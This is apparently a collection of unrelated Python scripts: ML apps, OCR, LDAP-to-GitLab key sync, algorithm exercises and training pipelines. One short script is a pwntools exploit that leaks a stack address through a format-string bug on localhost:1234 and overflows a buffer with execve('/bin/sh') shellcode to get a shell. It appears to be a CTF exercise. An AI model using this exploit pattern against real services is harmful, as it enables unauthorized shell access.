prediction=predicter.predict([[WeakFoot, HeadingAccuracy, Dribbling, SprintSpeed, Reactions,Strength, Interceptions, shooting_attributes,passing_attribtes]])
print(prediction)
return prediction
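# Example call (illustrative attribute values, not from the original script):
# predict_overall(3, 70, 80, 85, 75, 70, 40, 78, 82) returns the predicted Overall;
# the argument order must match the feature order fifa.pkl was trained with.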
def main():
image = Image.open('fifa.jpg')
st.image(image, caption=None, width=None, use_column_width=False, clamp=False, channels='RGB', format='JPEG')
st.title("Fifa Overall predictor")
html_temp = """
<div style="background-color:tomato;padding:10px">
<h2 style="color:white;text-align:center;">Fifa Overall predictor ML App </h2>
</div>
"""
st.markdown(html_temp,unsafe_allow_html=True)
#WeakFoot = st.number_input("Weak Foot",min_value=None)
HeadingAccuracy = st.slider("HeadingAccuracy",min_value=None)
Dribbling = st.slider("Dribbling",min_value=None)
SprintSpeed = st.slider("SprintSpeed",min_value=None)
Reactions = st.slider("Reactions",min_value=None)
Strength = st.slider("Strength",min_value=None)
Interceptions = st.slider("Interceptions",min_value=None)
shooting_attributes = st.slider("shooting_attributes",min_value=None)
passing_attribtes = st.slider("passing_attribtes",min_value=None )
result=""
if st.button("Predict"):
result=predict_overall(int(3), HeadingAccuracy, Dribbling,SprintSpeed
,Reactions,Strength,Interceptions, shooting_attributes
,passing_attribtes)
st.success('The predicted Overall is {}'.format(result))
if st.button("Click to know some facts about the 'Beautifull Game'"):
st.text("FIFA has always ensured that regions across the world get customized covers. From Rooney in England to Ronaldinho in Brazil; popular regions also have access to customized club covers, which can be easily downloaded.")
st.text("Soccer is the only major world sport in which you can't use your hands to manipulate the ball or object of play")
st.text('A 2000 internet poll voted Argentine Diego Maradona "the player of the century." FIFA disagreed strongly enough that they appointed a special committee to render judgment. The committee selected Pelé.')
st.text('Brazilians refer to soccer as the “jogo bonito” or “beautiful game.”')
if __name__=='__main__':
main()
|
"""
compute similarity between all pairs of images in the neurosynth dataset
"""
import os,pickle
import numpy,pandas
from joblib import Parallel, delayed,dump,load
from sklearn.metrics import f1_score,jaccard_similarity_score
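# Note: jaccard_similarity_score was removed in newer scikit-learn releases;
# sklearn.metrics.jaccard_score is its replacement (this script assumes an older version).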
njobs=24
data=pickle.load(open('../data/neurosynth/neurosynth_reduced_cleaned.pkl','rb'))
data=(data>0).astype('int')
dump(data,'data.mm')
data = load('data.mm', mmap_mode='r')
coords=[]
for i in range(data.shape[0]):
for j in range(i,data.shape[0]):
if i==j:
continue
coords.append((i,j))
def get_similarity(data,c):
i,j=c
return jaccard_similarity_score(data[i,:],data[j,:])
results=Parallel(n_jobs=njobs)(delayed(get_similarity)(data,c) for c in coords)
pickle.dump(results,open('../data/neurosynth/ns_image_similarity_results.pkl','wb'))
os.remove('data.mm')
|
from pwn import *
shellcode = (
"\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x6a\x1c\x58"
"\x83\xE8\x11"
"\x99\xcd\x80"
)
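# The bytes above are a standard 32-bit Linux execve("/bin///sh") stub:
# push the path onto the stack, mov ebx,esp; xor ecx,ecx; eax = 0x1c - 0x11 = 0x0b
# (execve); cdq zeroes edx; int 0x80 issues the syscall.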
format_str = "%6$x\n"
con = remote('localhost', 1234)
#getting leaked addr
con.recvuntil("\n");
con.send(format_str);
data = con.recvuntil("\n")
con.recvuntil(": ")
#getting address of the buffer
leak = data.split(", ")[1]
print "leaked addr: 0x" + leak
ret_addr = int(leak,16) - 0x9a
#creating payload
payload = shellcode
payload += "f"*(62-len(shellcode))
payload += p32(ret_addr)
payload += "\n"
print "sending payload..."
con.send(payload)
con.interactive() |
#!/usr/bin/python
import sys
sys.path.append('/home/admin/bin')
from gnome_ldap_utils import *
from gitlab import *
execfile('/home/admin/secret/freeipa')
glu = Gnome_ldap_utils(LDAP_GROUP_BASE, LDAP_HOST, LDAP_USER_BASE, 'cn=Directory Manager', ldap_password)
gitlab = Gitlab('gitlab.gnome.org', GITLAB_PRIVATE_TOKEN)
gnomecvs_members = glu.get_uids_from_group('gnomecvs')
for id, username in gitlab.list_ldap_users().iteritems():
ssh_key = glu.get_attributes_from_ldap(username, 'ipaSshPubKey')
gitlab.add_ssh_keys(ssh_key, id)
#for username in gitlab.list_group_members('GNOME'):
# if username not in gnomecvs_members:
# print '%s is NOT part of the gnomecvs LDAP group' % username
|
from django.apps import AppConfig
from django.db.models.signals import post_save
class ForumConfig(AppConfig):
name = "aether.forum"
def ready(self):
from .models import ForumPost, ForumUser
from .signals import postprocess_forumpost, postprocess_forumuser
post_save.connect(postprocess_forumuser, sender=ForumUser)
post_save.connect(postprocess_forumpost, sender=ForumPost)
|
import sys
import requests
if len(sys.argv) != 2:
    print('Wrong number of arguments')
exit(1)
file = open('token.out', 'r')
token = file.readline().strip()  # strip the trailing newline so the Authorization header is valid
HEADERS = {'Authorization': f"Bearer {token}"}
response = requests.get('https://api.intra.42.fr/v2/users', headers=HEADERS)
users_list = response.json()
needle = sys.argv[1]
result = 0
for i in users_list:
    if needle == str(i['id']):  # the API returns ids as ints, argv is a string
result = i['login']
break
elif needle == i['login']:
result = i['id']
break
f = open("ex01.out", "w")
if result == 0:
result = "Item not found"
print("EMPTY")
f.write(str(result))
f.close()
|
#!/usr/bin/python
# coding:utf-8
import cv2
import os
from .Machersolution import Matcher
import numpy as np
import json
import base64
import requests
import sys
import config
Debug = True
class AlignerIDCard(object):
def __init__(self,templateImg,templateLabel):
templateimg = cv2.imread(templateImg)
self.size = templateimg.shape
self.matcher = Matcher()
self.KP,self.DES = self.matcher.sift_fet(templateimg)
f = open(templateLabel)
lines = f.readlines()
self.num = 0
f.close()
self.rects = []
self.names = []
self.imageRoot = None
for line in lines:
self.names.append(line.strip().split(' ')[0])
self.rects.append(list(map(int,line.strip().split(' ')[1:])))
def align(self,im):
kp, des = self.matcher.sift_fet(im)
alignedImg, M = self.matcher.post_match(self.KP, self.DES, kp, des, im, input_roi=None, outputsize=(self.size[1],self.size[0]),offset=(0, 0), threshold=0.7, good_num=10)
result = {}
for idx,rect in enumerate(self.rects):
pos = np.array([[rect[0],rect[0],rect[2],rect[2]],[rect[1],rect[3],rect[3],rect[1]]]).T
cut = alignedImg[rect[1]:rect[3],rect[0]:rect[2]]
name = self.names[idx]
result[name] = [cut,pos]
return result,alignedImg
def det(self,im):
address = config.MODEL_UNIVERSAL_EAST_IDCARD_API #MODEL_UNIVERSAL_EAST_DRIVER_API MODEL_UNIVERSAL_EAST_API
img_encoded = base64.b64encode(cv2.imencode('.png',im)[1].tostring())
result = requests.post(address,data=img_encoded)
boxes = json.loads(result.text,encoding='utf-8')
return boxes
def rec(self,im,boxes):
address = config.MODEL_CRANN_BOXES_API
img_encoded = base64.b64encode(cv2.imencode('.png',im)[1].tostring())
result = requests.post(address,data=json.dumps({'img':img_encoded.decode('utf-8'),'bboxes':boxes}))
result = json.loads(result.text,encoding='utf-8')
return result
def within(self,boxes,regions,th=0.4):
ret = []
for region in regions:
res = []
region = np.array(region)
x11 = np.min(region[:,0])
y11 = np.min(region[:,1])
x12 = np.max(region[:,0])
y12 = np.max(region[:,1])
for i,box in enumerate(np.array(boxes)):
x21 = np.min(box[:,0])
y21 = np.min(box[:,1])
x22 = np.max(box[:,0])
y22 = np.max(box[:,1])
area = (x22 - x21+1)*(y22-y21+1)
xx1 = max(x11,x21)
yy1 = max(y11,y21)
xx2 = min(x12,x22)
yy2 = min(y12,y22)
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
ioi = inter*1.0/area
if ioi >th:
res.append(i)
ret.append(res)
return ret
def AinB(self,A,B):
x11,y11,x12,y12 = A[0],A[1],A[2],A[3]
x21,y21,x22,y22 = B[0],B[1],B[2],B[3]
xx1 = max(x11,x21)
yy1 = max(y11,y21)
xx2 = min(x12,x22)
yy2 = min(y12,y22)
w = max(0.0, xx2 - xx1 + 1)
h = max(0.0, yy2 - yy1 + 1)
inter = w * h
return inter*1.0/((x12-x11+1)*(y12-y11+1))
def filtersmall(self,boxes,minH):
boxes2 = []
for box in boxes:
h = min(np.linalg.norm([box[1][0] - box[0][0],box[1][1] - box[0][1]]),np.linalg.norm([box[2][0] - box[1][0],box[2][1] - box[1][1]]))
if h >minH:
boxes2.append(box)
return boxes2
def trimBoundary(self,boxes,regions):
#match K->V
withinIdx = self.within(boxes,regions)
for regionIdx,indices in enumerate(withinIdx):
region = regions[regionIdx]
l,r,t,b = np.min(region[:,0]),np.max(region[:,0]),np.min(region[:,1]),np.max(region[:,1])
for boxIdx in indices:
box = np.array(boxes[boxIdx])
box[0,0] = box[1,0] = l
box[2,0] = box[3,0] = r
box[0,1] = box[3,1] = max(max(box[0,1],box[3,1]),t)
box[1,1] = box[2,1] = min(min(box[1,1],box[2,1]),b)
boxes[boxIdx] = box.tolist()
return boxes
def cvtResults(self,boxes,texts,regions,names):
#match K->V
withinIdx = self.within(boxes,regions)
#organize result
ret = {}
for idx,name in enumerate(names):
rindices = withinIdx[idx]
res = []
for index in rindices:
pred = np.array(boxes[index])
L = np.min(pred[:,0])
T = np.min(pred[:,1])
R = np.max(pred[:,0])
B = np.max(pred[:,1])
text = texts[index]
res.append({'pos':[L,T,R,B],'text':text})
ret[name] = res
return ret
def Chinese(self,ch):
if ord(ch) >= 0x4e00 and ord(ch)<= 0x9fa5:
return True
else:
return False
def merge(self,ret):
ret2 = {}
for key in ret:
text = ''.join(ret[key])
ret2[key] = text
return ret2
def resizebox(self,bboxes,image):
newboxes = []
for box in bboxes:
box = np.array(box)
# print(box)
centx = np.mean(box[:,0])
centy = np.mean(box[:,1])
cent = np.array([centx,centy])
# cv2.circle(image,(int(centx),int(centy)),5,(0,0,255),5)
centpoint = []
for i in range(4):
centpoint.append((box[i]+box[(i+1)%4])/2)
# cv2.circle(image,(int(((box[i]+box[(i+1)%4])/2)[0]),int(((box[i]+box[(i+1)%4])/2)[1])),5,(0,0,255),5)
centpoint = np.array(centpoint)
dis = np.sqrt((centpoint[:,0]-centx)*(centpoint[:,0]-centx)+(centpoint[:,1]-centy)*(centpoint[:,1]-centy))
newbox = []
if(dis[0]+dis[2]>dis[1]+dis[3]):
h = dis[1]+dis[3]
centpoint[0]=(centpoint[0]-np.array([centx,centy]))*(h*0.5/dis[0]+1)+np.array([centx,centy])
centpoint[2]=(centpoint[2]-np.array([centx,centy]))*(h*0.5/dis[2]+1)+np.array([centx,centy])
else:
h = dis[0]+dis[2]
centpoint[3]=(centpoint[3]-np.array([centx,centy]))*(h*0.5/dis[3]+1)+np.array([centx,centy])
centpoint[1]=(centpoint[1]-np.array([centx,centy]))*(h*0.5/dis[1]+1)+np.array([centx,centy])
# for i in range(4):
# cv2.circle(image,(int(centpoint[i][0]),int(centpoint[i][1])),5,(0,255,255),5)
for i in range(4):
newbox.append(((centpoint[i]-cent)+(centpoint[(i+1)%4]-cent)+cent).astype(np.int32).tolist())
# cv2.circle(image,(int(newbox[i][0]),int(newbox[i][1])),5,(0,255,255),5)
newboxes.append(newbox)
# cv2.imshow('image',image)
# cv2.waitKey(0)
return newboxes
def preferredSize(self,im,maxlong):
h,w = im.shape[:2]
if h>w:
H = maxlong
W = int(maxlong*1.0/h*w)
else:
W = maxlong
H = int(maxlong*1.0/w*h)
return cv2.resize(im,(W,H))
def tightBoundary(self,hitList,boxes,detectedBoxes,names,image):
for idx,name in enumerate(names):
if name in ['住址1','住址2','住址3','公民身份号码']:
hl = hitList[idx]
if len(hl)==1:
box = detectedBoxes[hl[0]]
if name == '公民身份号码':
boxes[idx] = box
continue
l,t,r,b= 32767,32767,-1,-1
for i in range(4):
l = min(box[i][0],l)
t = min(box[i][1],t)
r = max(box[i][0],r)
b = max(box[i][1],b)
# print(l,t,r,b)
cut = image[t:b,l:r,:]
offsetx = l
begin,end = self.projectMethod(cut)
# cv2.imshow('cut',cut)
# print(begin,end)
if begin<end:
l = offsetx+begin
r = offsetx+end
box[0][0],box[0][1]=l,t
box[1][0],box[1][1]=r,t
box[2][0],box[2][1]=r,b
box[3][0],box[3][1]=l,b
boxes[idx] = box
# for i in range(4):
# cv2.line(image,tuple(box[i]),tuple(box[(i+1)%4]),(0,0,255),3)
# # cv2.imshow('image',image)
# # cv2.waitKey(0)
# # print(boxes)
elif len(hl)>1:
print('xxxxxxxx',hl)
L,T,R,B= 32767,32767,-1,-1
for i in hl:
box = detectedBoxes[hl[0]]
l,t,r,b= 32767,32767,-1,-1
for i in range(4):
l = min(box[i][0],l)
t = min(box[i][1],t)
r = max(box[i][0],r)
b = max(box[i][1],b)
boxes[idx] = [[l,t],[r,t],[r,b],[l,b]]
elif name != '住址1' and name!= '公民身份号码':
boxes[idx] = [[0,0],[0,1],[1,1],[1,0]]
return np.array(boxes).tolist()
def projectMethod(self,cut,th = 0.0):
gray_img = cv2.cvtColor(cut,cv2.COLOR_BGR2GRAY)
_, binary_img = cv2.threshold(gray_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
binary_img = 255 - binary_img
verticalProj = np.sum(binary_img,axis=0)*1.0/binary_img.shape[1]
begin = np.min(np.where(verticalProj>th)[0])
end = np.max(np.where(verticalProj>th)[0])
return begin,end
def predet(self,img,num=0,filename=None):
# img = cv2.imdecode(np.fromstring(base64.b64decode(img), dtype=np.uint8), 1)
img = self.preferredSize(img,2000)
result,alignedImg = self.align(img)
if alignedImg is None:
return []
regions = []
names = []
for name in result:
cut = result[name][0]
pos = result[name][1]
if name == '姓名':
offsetx = pos[0][0]
begin,end = self.projectMethod(cut)
if begin<end:
pos[0][0] = pos[1][0] = offsetx+begin
pos[2][0] = pos[3][0] = offsetx+end
regions.append(pos.tolist())
names.append(name)
boxes = np.array(regions).tolist()
return alignedImg,names,regions,boxes
def prerecog(self,detectedBoxes,alignedImg,names,regions,boxes):
detectedBoxes = self.resizebox(detectedBoxes,alignedImg)
showimg = alignedImg.copy()
hitList = self.within(detectedBoxes,regions,0.7)
boxes = self.tightBoundary(hitList,boxes,detectedBoxes,names,alignedImg)
boxes = self.filtersmall(boxes,10)
# handle name issue
boxes[-1][0][0] -= 20
boxes[-1][1][0] -= 20
boxes[-1][2][0] += 20
boxes[-1][3][0] += 20
return boxes
def postprocess(self,boxes,texts,regions,names):
ret = self.cvtResults(boxes,texts,regions,names)
ret2 = {}
for key in ret:
if not '住址' in key:
text = ret[key][0]['text'].decode('utf8')
if key == '性民':
gender = '男'
nation = '汉'
if '女' in text.decode('utf8'):
gender = '女'
pos = text.find('族')
if pos > -1:
nation = text[pos+1:]
newnation = ''
for i in range(len(nation)):
if nation[i]>='0' and nation[i]<='9':
continue
newnation+=nation[i]
nation = newnation
if nation == '汊':
nation = '汉'
ret2['性别'] = gender
ret2['民族'] = nation
elif key == '出生':
text2 = ''
for ch in text.decode('utf8'):
if ch.isdigit() or ch in ['年','月','日']:
text2 += ch
if text2.find('日' )==-1:
text2+='日'
accNum = 0
for i in range(len(text2)):
if text2[i].isdigit():
accNum+=1
prefix = {1:'199',2:'19',3:'1'}
if accNum<4 and accNum>=1:
text2 = prefix[accNum]+text2
if not ('年' in text2) and len(text2) > 4 and not (text2[4]=='年'):
text2 = text2[:4]+'年'+text2[4:]
ret2[key] = text2
elif key == '姓名':
text2 = ''
for ch in text.decode('utf8'):
if self.Chinese(ch):
text2+=ch
ret2[key] = text2
elif key =='公民身份号码':
text2 = ''
for ch in text.decode('utf8'):
if ch.isdigit():
text2+=ch
                        elif ch in ('x', 'X'):  # keep the ID checksum character
text2+='X'
ret2[key] = text2
else:
tmp = ''
ret2['住址'] = ''
for zhuzhi in ['住址1','住址2','住址3']:
if len(ret[zhuzhi])>0:
zhuzhiziduan = ret[zhuzhi][0]['text']
zhuzhiziduan2 = ''
for ch in zhuzhiziduan.decode('utf8'):
if ch.isdigit()or self.Chinese(ch):
zhuzhiziduan2+=ch
tmp+=zhuzhiziduan2
else:
break
for ch in tmp.decode('utf8'):
if ch != '住' and ch != '址':
ret2['住址']+=ch
return ret2
def test(self):
f = open('output2.txt','w+')
for filename in os.listdir(self.imageRoot):
print(filename)
f.write('\n')
f.write(filename)
f.write('\n')
im = cv2.imread(self.imageRoot+'/'+filename)
ret = self.run(im,filename)
if Debug:
for key in ret:
val = ret[key]
print(key,val)
f.write(key)
f.write(':')
f.write(val)
f.write('\n')
print('----------------------------------')
cv2.waitKey(30)
f.close()
class AlignerJiaZhao(AlignerIDCard):
def __init__(self):
super(AlignerJiaZhao, self).__init__('template/1.jpg','template/1.txt')
self.imageRoot = 'image'
if __name__ == '__main__':
aligner = AlignerJiaZhao()
aligner.test()
|
from Stack import Stack
def Hist():
user_input = ""
a = []
b = []
c = []
d = []
    while user_input != "Done":
        user_input = input("Enter a number between 0 and 100 per line (type Done to finish): \n")
if user_input.isdigit():
item = int(user_input)
if item in range (0,25):
a.append(item)
elif item in range (25,50):
b.append(item)
elif item in range (50,75):
c.append(item)
else:
d.append(item)
return a,b,c,d
a,b,c,d = Hist()
print('[0,25]', len(a) * '*')
print('[25,50]', len(b) * '*')
print('[50,75]', len(c) * '*')
print('[75, 100]', len(d) * '*')
|
import sys
sys.setrecursionlimit(10**6)
input = sys.stdin.readline
N = int(input())
tree = {}
def preOrder(root):
print(root, end = "")
if tree[root][0] != ".":
preOrder(tree[root][0])
if tree[root][1] != ".":
preOrder(tree[root][1])
def inOrder(root):
if tree[root][0] != ".":
inOrder(tree[root][0])
print(root, end = "")
if tree[root][1] != ".":
inOrder(tree[root][1])
def postOrder(root):
if tree[root][0] != ".":
postOrder(tree[root][0])
if tree[root][1] != ".":
postOrder(tree[root][1])
print(root, end = "")
# Build the tree (adjacency list)
for _ in range(N):
root, left, right = input().rstrip().split()
tree[root] = [left, right]
preOrder('A')
print()
inOrder('A')
print()
postOrder('A')
print() |
__author__ = 'vikram'
def vikgcd(a, b):
"""Calculate the Greatest Common Divisor of a and b.
Unless b==0, the result will have the same sign as b (so that when
b is divided by it, the result comes out positive).
:rtype : int
"""
i = 0
while b:
a, b = b, a % b
i += 1
return a, i
print(vikgcd(8, 6))
|
from torchvision import datasets
import matplotlib.pyplot as plt
a = datasets.MNIST("./data/mnist",
train=True,
download=True,
)
b, c = a.__getitem__(37038)
plt.imshow(b)
print(c) |
#!/usr/bin/env python
import os
import time
from collections import ChainMap
from typing import Dict
import glob2
import numpy as np
from pyarrow.parquet import ParquetFile
from src.dataset.DatasetDF import DatasetDF
from src.dataset.ParquetImageDataGenerator import ParquetImageDataGenerator
from src.dataset.Transforms import Transforms
from src.models.MultiOutputCNN import MultiOutputCNN
from src.settings import settings
from src.util.argparse import argparse_from_dicts
from src.util.csv import df_to_submission_csv, submission_df_generator
from src.util.hparam import callbacks, hparam_key, model_compile, model_stats_from_history
from src.util.logs import log_model_stats
def image_data_generator_cnn(
train_hparams: Dict,
model_hparams: Dict,
transform_X_args: Dict,
transform_Y_args: Dict,
datagen_args: Dict,
pipeline_name = 'image_data_generator_cnn',
model_file = None,
log_dir = None,
verbose = 2,
load_weights = True,
fileglobs = {}
):
combined_hparams = { **model_hparams, **train_hparams, **transform_X_args, **transform_Y_args, **datagen_args }
train_hparams = { **settings['hparam_defaults'], **train_hparams }
if verbose:
print('-----')
print("pipeline_name", pipeline_name)
print("train_hparams", train_hparams)
print("transform_X_args", transform_X_args)
print("transform_Y_args", transform_Y_args)
print("datagen_args", datagen_args)
print("model_file", model_file)
print("log_dir", log_dir)
print("load_weights", load_weights)
print('-----')
model_hparams_key = hparam_key(model_hparams)
train_hparams_key = hparam_key(train_hparams)
transform_key = hparam_key(ChainMap(*[ transform_X_args, transform_Y_args, datagen_args ]))
# csv_data = pd.read_csv(f"{settings['dir']['data']}/train.csv")
model_file = model_file or f"{settings['dir']['models']}/{pipeline_name}/{pipeline_name}-{model_hparams_key}.hdf5"
log_dir = log_dir or f"{settings['dir']['logs']}/{pipeline_name}/{transform_key}/"
os.makedirs(os.path.dirname(model_file), exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
dataset_rows = ParquetFile(f"{settings['dir']['data']}/train_image_data_0.parquet").metadata.num_rows
dataset = DatasetDF(
size=1,
transform_X_args=transform_X_args,
transform_Y_args=transform_Y_args,
)
input_shape = dataset.input_shape()
output_shape = dataset.output_shape()
model = MultiOutputCNN(
input_shape=input_shape,
output_shape=output_shape,
**model_hparams,
)
model_compile(model_hparams, model, output_shape)
# Load Pre-existing weights
if load_weights:
if os.path.exists( model_file ):
try:
model.load_weights( model_file )
print('Loaded Weights: ', model_file)
except Exception as exception: print('exception', exception)
if os.environ.get('KAGGLE_KERNEL_RUN_TYPE'):
load_models = (glob2.glob(f'../input/**/{os.path.basename(model_file)}')
+ glob2.glob(f'../input/**/{os.path.basename(model_file)}'.replace('=',''))) # Kaggle Dataset Upload removes '='
for load_model in load_models:
try:
model.load_weights( load_model )
print('Loaded Weights: ', load_model)
# break
except Exception as exception: print('exception', exception)
if verbose:
model.summary()
flow_args = {}
flow_args['train'] = {
"transform_X": Transforms.transform_X,
"transform_Y": Transforms.transform_Y,
"transform_X_args": transform_X_args,
"transform_Y_args": transform_Y_args,
"batch_size": train_hparams['batch_size'],
"reads_per_file": 2,
"resamples": 1,
"shuffle": True,
"infinite": True,
}
flow_args['valid'] = {
**flow_args['train'],
"resamples": 1,
}
flow_args['test'] = {
**flow_args['train'],
"resamples": 1,
"shuffle": False,
"infinite": False,
"test": True,
}
datagens = {
"train": ParquetImageDataGenerator(**datagen_args),
"valid": ParquetImageDataGenerator(),
"test": ParquetImageDataGenerator(),
}
# [ datagens[key].fit(train_batch) for key in datagens.keys() ] # Not required
fileglobs = {
"train": f"{settings['dir']['data']}/train_image_data_[123].parquet",
"valid": f"{settings['dir']['data']}/train_image_data_0.parquet",
"test": f"{settings['dir']['data']}/test_image_data_*.parquet",
**fileglobs
}
### Preserve test/train split for Kaggle
# if os.environ.get('KAGGLE_KERNEL_RUN_TYPE'):
# # For the Kaggle Submission, train on all available data and rely on Kaggle Timeout
# fileglobs["train"] = f"{settings['dir']['data']}/train_image_data_*.parquet"
generators = {
key: datagens[key].flow_from_parquet(value, **flow_args[key])
for key,value in fileglobs.items()
}
dataset_rows_per_file = {
key: np.mean([ ParquetFile(filename).metadata.num_rows for filename in glob2.glob(fileglobs[key]) ])
for key in fileglobs.keys()
}
dataset_rows_total = {
key: sum([ ParquetFile(filename).metadata.num_rows for filename in glob2.glob(fileglobs[key]) ])
for key in fileglobs.keys()
}
    ### Epoch: train == one whole parquet file | valid = 1 filesystem read
steps_per_epoch = int(dataset_rows_per_file['train'] / flow_args['train']['batch_size'] * flow_args['train']['resamples'] )
validation_steps = int(dataset_rows_per_file['valid'] / flow_args['valid']['batch_size'] / flow_args['train']['reads_per_file'] )
callback = callbacks(combined_hparams, dataset, model_file, log_dir, best_only=True, verbose=1)
timer_start = time.time()
history = model.fit(
generators['train'],
validation_data = generators['valid'],
epochs = train_hparams['epochs'],
steps_per_epoch = steps_per_epoch,
validation_steps = validation_steps,
verbose = verbose,
callbacks = callback
)
timer_seconds = int(time.time() - timer_start)
model_stats = model_stats_from_history(history, timer_seconds, best_only=True)
return model, model_stats, output_shape
if __name__ == '__main__':
# Fastest with high score
# - maxpool_layers=5 | cnns_per_maxpool=3 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=False
#
# Shortlist:
# - maxpool_layers=5 | cnns_per_maxpool=3 | dense_layers=1 | dense_units=512 | global_maxpool=True | regularization=False
# - maxpool_layers=4 | cnns_per_maxpool=4 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=False
# - maxpool_layers=4 | cnns_per_maxpool=4 | dense_layers=1 | dense_units=256 | global_maxpool=False | regularization=True
hparams = {}
hparams['model'] = {
"cnns_per_maxpool": 3,
"maxpool_layers": 5,
"cnn_units": 32,
"cnn_kernel": 3,
"cnn_strides": 1,
"dense_layers": 1,
"dense_units": 256,
# "regularization": False, # Produces worse results
# "global_maxpool": False, #
"activation": 'relu', # 'relu' | 'crelu' | 'leaky_relu' | 'relu6' | 'softmax' | 'tanh' | 'hard_sigmoid' | 'sigmoid'
"dropout": 0.25,
}
hparams['transform_X'] = {
"resize": 2,
# "invert": True,
"rescale": True,
"denoise": True,
"center": True,
# "normalize": True,
}
hparams['transform_Y'] = {
}
# Source: https://www.kaggle.com/jamesmcguigan/bengali-ai-image-processing
hparams['datagen'] = {
# "rescale": 1./255, # "normalize": True is default in Transforms
"zoom_range": 0.2,
"width_shift_range": 0.1, # we already have centering
"height_shift_range": 0.1, # we already have centering
"rotation_range": 45/2,
"shear_range": 45/2,
# "brightness_range": 0.5, # Prebrightness normalized
"fill_mode": 'constant',
"cval": 0,
# "featurewise_center": True, # No visible effect in plt.imgshow()
# "samplewise_center": True, # No visible effect in plt.imgshow()
# "featurewise_std_normalization": True, # No visible effect in plt.imgshow() | requires .fit()
# "samplewise_std_normalization": True, # No visible effect in plt.imgshow() | requires .fit()
# "zca_whitening": True, # Kaggle, insufficent memory
}
hparams['train'] = {
"optimizer": "Adadelta",
"scheduler": "plateau10",
"learning_rate": 1,
"patience": 20,
"best_only": True,
"batch_size": 128, # Too small and the GPU is waiting on the CPU - too big and GPU runs out of RAM - keep it small for kaggle
"epochs": 999,
"loss_weights": False,
}
if os.environ.get('KAGGLE_KERNEL_RUN_TYPE') == 'Interactive':
hparams['train']['patience'] = 0
hparams['train']['epochs'] = 1
hparams['train'] = { **settings['hparam_defaults'], **hparams['train'] }
argparse_from_dicts(list(hparams.values()), inplace=True)
pipeline_name = "image_data_generator_cnn"
hparams_model_key = hparam_key(hparams['model'])
hparams_transform_key = hparam_key(ChainMap(*[ hparams['transform_X'], hparams['transform_Y'], hparams['datagen'] ]))
logfilename = f"{settings['dir']['submissions']}/{pipeline_name}/{hparams_transform_key}/{hparams_model_key}-submission.log"
csv_filename = f"{settings['dir']['submissions']}/{pipeline_name}/{hparams_transform_key}/{hparams_model_key}-submission.csv"
model, model_stats, output_shape = image_data_generator_cnn(
train_hparams = hparams['train'],
model_hparams = hparams['model'],
transform_X_args = hparams['transform_X'],
transform_Y_args = hparams['transform_Y'],
datagen_args = hparams['datagen'],
pipeline_name = pipeline_name,
load_weights = bool(os.environ.get('KAGGLE_KERNEL_RUN_TYPE'))
)
log_model_stats(model_stats, logfilename, hparams)
submission = submission_df_generator(model, output_shape)
df_to_submission_csv( submission, csv_filename )
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
print "开始"
print "......"
# Load an existing Firefox profile
profiledir = webdriver.FirefoxProfile(r"/Users/sunying/Library/Application Support/Firefox/Profiles/sr6smerq.default")
# Open the Firefox browser
driver = webdriver.Firefox(profiledir)
# Log in to Jiankongbao
driver.get("http://www.jiankongbao.com")
driver.find_element_by_id("dropdown-signin").click()
driver.find_element_by_id("email").clear()
driver.find_element_by_id("email").send_keys("**@yunzhihui.com")
driver.find_element_by_id("pwd").clear()
driver.find_element_by_id("pwd").send_keys("*** ")
driver.find_element_by_id("sigin_btn").click()
time.sleep(3)
driver.close()
driver.quit()
print "结束"
|
from math import ceil,sqrt
ltej = 6
nn = 10**3
def easyif(n):
if n in (2,3,5):
return True
if n%2 == 0:
return False
if n%3 == 0:
return False
if n%5 == 0:
return False
    for i in range(7, int(sqrt(n)) + 1):  # include sqrt(n) itself so perfect squares are not reported as prime
if n%i == 0:
return False
return True
biglist=[]
for i in range(2,nn):
if easyif(i):
biglist.append(i)
def hardif(n):
for i in biglist:
if n%i == 0:
return False
return True
def genif(n):
global nn
if n<nn:
return easyif(n)
else:
return hardif(n)
def dissipate(n):
table = []
for i in range(len(str(n))):
table.append(int(str(n)[i]))
return table
def rotate(n,ile):
table = []
trial = dissipate(n)
for i in range(1,ile+1):
table.append(trial[-(ile+1)+i])
for i in trial:
table.append(i)
for i in range(1,ile+1):
del table[-1]
return table
def merge(n):
sum = 0
counter = 0
for i in n:
sum += i*10**(len(n)-counter-1)
counter += 1
return sum
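# Example of the helpers above (a worked check, not in the original script):
# dissipate(197) -> [1, 9, 7], rotate(197, 1) -> [7, 1, 9], merge([7, 1, 9]) -> 719,
# so the loop below keeps a prime only if every digit rotation is also prime
# (circular primes, as in Project Euler problem 35).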
circular_primes = []  # avoid shadowing the built-in name `list`
for i in range(2,10**6):
if easyif(i):
checker = True
for j in range(1,len(str(i))):
rot = merge(rotate(i,j))
if not easyif(rot):
checker = False
        if checker:
            circular_primes.append(i)
print(circular_primes)
print(len(circular_primes))
|
import os
import time
from typing import List
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np # Random selection
from PIL import Image
import torch # Tensor library
import torch.nn as nn # loss functions
import torch.optim as optim # Optimization and schedulers
import torch.nn.functional as F
from torch.utils.data import DataLoader # Building custom datasets
import torchvision.transforms as T # Image processing
from torch.cuda import amp
from custom_transforms import CustomTransformation, AddGaussianNoise
from dataset_segment import LiveSegmentDataset
from logger import Logger
from metrics import pixel_accuracy, jaccard_iou, dice_coeff, tversky_measure, focal_metric
from models.unet import UNet, save_unet
def set_seed(seed):
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
def view_outputs(model, train_dataset, threshold=0.5):
nrows = 5
ncols = 2
rows = []
for i in range(nrows):
row = []
for j in range(ncols):
img, mask = train_dataset.gen.gen_segment(fill_prob=0.4)
x = val_transforms(img).to(device).unsqueeze(0)
out = model.predict(x).detach().cpu().numpy()
preds = (np.repeat(out[0][:, :, :], 3, axis=0).transpose(1, 2, 0) > threshold)
row.append(img)
fp_mask = ((1-np.array(mask)/255) * preds*255)
fn_mask = (np.array(mask) * (1-preds))
row.append(preds*255) # multiple to 255 rgb scale
row.append(fp_mask)
